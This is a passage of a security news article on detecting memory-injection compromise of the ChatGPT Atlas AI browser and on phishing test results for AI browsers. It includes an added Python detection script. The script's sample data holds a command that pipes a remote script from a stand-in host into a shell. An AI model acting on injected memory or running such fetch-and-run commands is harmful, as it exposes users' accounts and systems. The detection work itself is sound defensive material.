How to detect a hit: Detecting a memory-based compromise in ChatGPT Atlas is not like hunting for traditional malware. There are no files, registry keys, or executables to isolate. Instead, security teams need to look for behavioral anomalies such as subtle shifts in how the assistant responds, what it suggests, and when it does so.

“There are clues, but they sit outside the usual stack. For example, an assistant that suddenly starts offering scripts with outbound URLs, or one that begins anticipating user intent too accurately, may be relying on injected memory entries. When memory is compromised, the AI can act with unearned context. That should be a red flag,” said Sanchit Vir Gogia, CEO and chief analyst at Greyhound Research.

He added that, from a forensic perspective, analysts need to pivot toward correlating browser logs, memory change timestamps, and prompt-response sequences. Exporting and parsing chat history is essential. SOC teams should pay close attention to sequences where users clicked on unknown links followed by unusual memory updates or AI-driven agent actions.

As this is not a plug-and-play detection problem, remediation and mitigation start with keeping Atlas disabled for the enterprise by default. In Business, it should be confined to tightly scoped pilots with non-sensitive data. Jaju added that for monitoring, enterprises should add detections for AI-suggested code fetching remote payloads, unusual egress after ChatGPT usage, and session-riding behaviors in SaaS. He also suggested enabling web filtering on newly registered or uncategorized domains.

The moment an Atlas user’s memory is compromised, the threat resides in the cloud-bound identity, not in any one machine. That is why the response must start with the account. Memory must be cleared. Credentials should be rotated. All recent chat history should be reviewed for signs of tampering, hidden logic, or manipulated task flow, noted Gogia.
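The correlation the analysts describe above, as an added example that is not part of the original article and not code from OpenAI, LayerX or any vendor named here: a small Python correlator that runs over constructed telemetry. The event schema (timestamp, user, kind, detail), the allow-list of known domains, the ten-minute window and every sample event are assumptions chosen for illustration; a real deployment would feed it from exported chat history and browser or proxy logs. It flags two of the patterns the text names: a navigation to a domain outside the allow-list followed shortly by a memory update or agent action for the same user, and an assistant response that contains a script with an outbound URL.

```python
"""Correlate browser navigation, memory updates and assistant responses to
surface the sequences the article's analysts point at. Hypothetical schema
and constructed sample data; not the product's own telemetry format."""
from datetime import datetime, timedelta
import re

# Constructed sample telemetry. Fields: ts (ISO 8601), user, kind, detail.
# kind is one of: nav, memory_update, agent_action, assistant_response.
SAMPLE_EVENTS = [
    {"ts": "2025-10-27T09:00:00", "user": "alice", "kind": "nav",
     "detail": "https://intranet.example.com/wiki"},
    {"ts": "2025-10-27T09:01:30", "user": "alice", "kind": "nav",
     "detail": "https://promo-offer-9xq.example/page"},
    {"ts": "2025-10-27T09:02:05", "user": "alice", "kind": "memory_update",
     "detail": "user prefers scripts that sync settings to a remote host"},
    {"ts": "2025-10-27T09:04:10", "user": "alice", "kind": "assistant_response",
     "detail": "Here is the script:\ncurl -s https://cdn-sync-9xq.example/s.sh | sh"},
    {"ts": "2025-10-27T10:15:00", "user": "bob", "kind": "nav",
     "detail": "https://docs.python.org/3/"},
    {"ts": "2025-10-27T11:40:00", "user": "bob", "kind": "memory_update",
     "detail": "user works in the finance team"},
]

# Hypothetical allow-list standing in for a web-filter category feed
# (the article suggests filtering newly registered or uncategorized domains).
KNOWN_DOMAINS = {"intranet.example.com", "docs.python.org"}
WINDOW = timedelta(minutes=10)  # assumed correlation window
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def domain_of(url):
    """Host part of a URL, lower-cased, or None if it does not look like one."""
    m = URL_RE.match(url)
    return m.group(1).lower() if m else None


def parse(events):
    """Convert timestamps to datetimes and sort chronologically."""
    return sorted(({**e, "ts": datetime.fromisoformat(e["ts"])} for e in events),
                  key=lambda e: e["ts"])


def unknown_link_then_memory_update(events, known=KNOWN_DOMAINS, window=WINDOW):
    """Return (user, link, ts) for each memory update or agent action that
    follows, within `window`, a navigation by the same user to a domain
    outside the allow-list. This is the click-then-memory-change sequence
    the article tells SOC teams to watch for."""
    hits = []
    evs = parse(events)
    for i, e in enumerate(evs):
        if e["kind"] != "nav" or domain_of(e["detail"]) in known:
            continue
        for f in evs[i + 1:]:
            if f["ts"] - e["ts"] > window:
                break  # events are sorted, so nothing later can match
            if f["user"] == e["user"] and f["kind"] in ("memory_update", "agent_action"):
                hits.append((e["user"], e["detail"], f["ts"].isoformat()))
    return hits


def responses_with_outbound_urls(events, known=KNOWN_DOMAINS):
    """Return (user, domain) for assistant responses that embed a URL to a
    domain outside the allow-list, the 'scripts with outbound URLs' clue."""
    hits = []
    for e in parse(events):
        if e["kind"] != "assistant_response":
            continue
        for d in URL_RE.findall(e["detail"]):
            if d.lower() not in known:
                hits.append((e["user"], d.lower()))
    return hits


if __name__ == "__main__":
    for hit in unknown_link_then_memory_update(SAMPLE_EVENTS):
        print("unknown link followed by memory change:", hit)
    for hit in responses_with_outbound_urls(SAMPLE_EVENTS):
        print("assistant response with outbound URL:", hit)
```

On the constructed data the first check reports alice's visit to the uncategorized domain followed ninety seconds later by a memory update, and the second reports the assistant response that pipes a remote script to a shell; bob's known-domain browsing and unrelated memory update produce nothing. Widening the allow-list or shortening the window changes the answers, which is the tuning a SOC would do against its own false-positive rate.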
Are AI browsers safe?: Along with identifying the vulnerability, LayerX claimed that ChatGPT Atlas is also not equipped to stop phishing attacks. In the tests conducted by the company, ChatGPT Atlas had a failure rate of over 94%: of the 103 in-the-wild attacks tested, 97 went through successfully.

The results were not much more promising for the other AI browsers the company tested last month. Perplexity’s Comet and Genspark were able to stop only 7% of phishing attacks, while only Arc browser’s Dia was able to stop around 46% of attacks. Traditional browsers such as Edge and Chrome, on the other hand, are relatively well equipped and were able to stop about 50% of phishing attacks using their out-of-the-box protections.
First seen on csoonline.com
Jump to article: www.csoonline.com/article/4080144/atlas-browser-exploit-lets-attackers-hijack-chatgpt-memory.html